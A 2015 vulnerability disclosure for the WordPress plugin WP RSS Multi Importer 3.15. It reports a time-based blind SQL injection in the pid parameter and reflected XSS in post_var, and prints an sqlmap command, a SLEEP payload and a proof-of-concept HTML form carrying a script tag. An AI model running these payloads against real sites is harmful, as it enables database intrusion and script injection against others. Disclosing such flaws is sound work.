Subject: Blind SQL injection and Reflected XSS in WP RSS Multi Importer 3.15
Date: Wed, 8 Jul 2015 21:59:31 +0200


Plugin: WP RSS Multi Importer 3.15

Remote authenticated users can execute arbitrary SQL commands and inject html/javascript.

1. SQL injection (rssmi_fetch_feed_items())

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=rssmi_fetch_items_now
Vulnerable parameter: pid

Please note that attacker needs valid post_id (post_type == rssmi_feed and post_status == publish).

Example PHP callstack:

fetch_feeds_for_id   [/wp-rss-multi-importer/inc/custom_posts.php:725]
rssmi_fetch_feed_items   [/wp-rss-multi-importer/inc/import_feeds.php:217]

Sqlmap verification:

sqlmap --cookie "..." --method POST --data "pid=148" -u "http://localhost/wp-admin/admin-ajax.php?action=rssmi_fetch_items_now" --dbms mysql -p pid

Parameter: pid (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: pid=148 AND (SELECT * FROM (SELECT(SLEEP(5)))xVME)

2. XSS (save_template_function())

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=wprssmi_response
Vulnerable parameter: post_var


<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=wprssmi_response">
<input type="text" name="save_var" value="2" />
<input type="text" name="post_var" value="<script>alert('XSS');</script>" />
<input type="submit" />

Marcin Probola,